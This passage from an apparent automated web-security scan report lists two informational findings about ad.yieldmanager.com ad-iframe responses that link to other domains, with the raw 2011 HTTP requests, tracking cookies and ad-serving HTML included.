Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; vuday1=BKZI(BgvR+4M6Eq!79C8LO3Y0; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:24 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0133.rm.sp2
Set-Cookie: ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!%=3f9'!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:45:24 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f9'=3p6,M.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:45:24 GMT
Set-Cookie: uid=uid=171d2eac-d886-11e0-9af3-78e7d16242b6&_hmacv=1&_salt=319101247&_keyid=k1&_hmac=a9d5113b5118d5859bece0305bda41a4443fdd38; path=/; expires=Thu, 06-Oct-2011 12:45:24 GMT
Set-Cookie: lifb=0EA2)D0!)KJ4EWf; path=/; expires=Fri, 09-Sep-2011 12:45:24 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:45:24 GMT
Pragma: no-cache
Content-Length: 1002
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9773674);}
</script><iframe src="http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313124&click=http://ads.bluelithium.com/clk?3,eAGlUctyolAQ.ZlZTTncN1xD3cVFIAEkisEJuLF4OBiEAZEEzdcPNUZr9tObPtWPc6pPI6IjhjHjdJfsMpWzlOqIYLLLGGeQTKCu61jjVMMUQTiJvLUpvTJ.lMbRadfyGl3rBl9QSl86NwylDKQ5c9X3Mf8NLzmdb93.y2bu3oVGweKLjUb2snSMO7dpDXEYo-dPa5i.BnRhxr0f2pU.Q2-b8MDmYUY3YX7ww5.1M.ZpPNw3xWTf9-0DAEXVpEmlJF2uXJJ90yhZU4MX51Eg1qL3X8fpEfhC4xonREGUcjadaiMYTeQEK5yNNU0Fpji1TdefwIvATFUpx-zBd5YYbC9VL2Rd4IXtqJlbrSunqE0Vh8SG7HecGSAWsXxaLIAVLQUiiBEMCWRgLrKmPW9fPWdpaa1ctWVYKUMZuNzf51pyYLWdW3I2334CQ0Qf3Vnmhrm6FD-Ae6UZuSDTEOFTDXii48kQZeuD-1Sm6RsJNpc0awIghYrH948jKwHB9283V67X.OPIH92VpyU=," frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="100"></iframe>
...[SNIP]...

15.36. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?XKUDANuUGABxQIsAAAAAAB4aEgAAAAAAAAAAAAIAAAAAAA0AAwADCOQEHgAAAAAA7mUJAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0AAAAAAAAAUQMh2vp8aLwdAAAAAAAAAFEDIdr6fGi8HQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADybj2mQvquCoy2g5qtNswR0SnC3DrdYwQyp9lvAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15rhf5648%2FM%3D787833.14445125.14291892.1806201%2FD%3Dsports%2FS%3D2022092242%3ALREC%2F_ylt%3DAuXImj6wykRaku7iPAhaBYTSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DEhSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261244%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445125%26Z%3D300x250%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D3458229403%26cb%3D1315313084968840%26i%3D140509%26r%3D0,0282c42a-d886-11e0-a87a-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ&ad_type=iframe&ad_size=300x250&site=140509&section_code=14445125&cb=1315313084968840&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rhf5648/M=787833.14445125.14291892.1806201/D=sports/S=2022092242:LREC/_ylt=AuXImj6wykRaku7iPAhaBYTSrYZ4/Y=YAHOO/EXP=1315320284/L=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ/B=EhSePtj8fcY-/J=1315313084968840/K=tHb_lv57MAgihszSpmJhkw/A=6261244/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=*YKlx8SkUp!79C8$pV9-; ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!#=3f8^"; bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; vuday1=BgvR)4M6Eq!79C8gRpX4; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0113.rm.sp2
Set-Cookie: ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!(=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:44:53 GMT
Set-Cookie: vuday1=BgvR+4M6Eq!79C8-g-VV; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:44:53 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:53 GMT
Pragma: no-cache
Content-Length: 1418
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="turn_ad_call_frame" width="300" height="250" frameborder="0" src="http://ad.turn.com/server/ads.htm?&pub=2701141&code=17152424&cch=6872266&l=300x250&nonjs=1&sli=615918&bli=1634623&exPub=24284&city=Dallas&acp=2.8980&rnd=1315313093&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGNkVuP2jAQhf9MnyoSx5ckziKrMiQsAbKBAFrCC8oNTO7KZVP664sKW23fOg%2DeY43ON%2EIxxOMzQfhMEyUJaYhRBMcQI5xEqhIa2kgZj8cYaqqhalgdHZZ7k7%2E1%2D1c%2D%2DbmxW%2E6nJiSwLg%2E5OO3nReF84ObU3Vjz51wv9ovnUKbeP6avgP%2EQZrzgn3vufXhY8s3HbJ3ak78Ak99cc5G%2DmQuxet8Q1%2EQ7ZzfLnSkUrhmL1S4ix12cOe9H4Zh77D85dz8bia6rXwC45FUY5HLQxPItEFUlR1UBtvYrg2ojzqpGKHCYTnWKsQwJISpE6l0gA1IDyZAqGlIgMFlbV03Xgi1DCkKKgRBBLyvPmoLTLe8Y7w92kWrDLfOCrNevay6Cib%2EbNv6RAJ%2E5fO66wDqsGcRQxXcEJWDFZtQUQ7G015Zec69Od7k8pBvbc0SsB5lazML7B9jWEUyYJbbJukvpOfIlsHhgIFYoMTRKiQKWrJuHp%2ExD1R1%2DuYr217YuFiIbAGca0iAiBHhMAd%2D%2EfebyeM%2DXTMpzDsK8uoBW9F1cDeUpqpoyaUBdtR3ortlVCoMmTBqpSYrgWrZSXyZFnVe3JJaCMpbaIP7RNyW7g6Sh1gjBvwHzxsfX%2C&url=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

15.37. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313084968840&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15jnbi3cd/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320284/L=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ/B=FBSePtj8fcY-/J=1315313084968840/K=tHb_lv57MAgihszSpmJhkw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!#=3f8^"; vuday1=BgvR*4M6Eq!79C8M#n45; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; liday1=*YKlx8SkUq!79C8gM+s%; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:55 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0192.rm.sp2
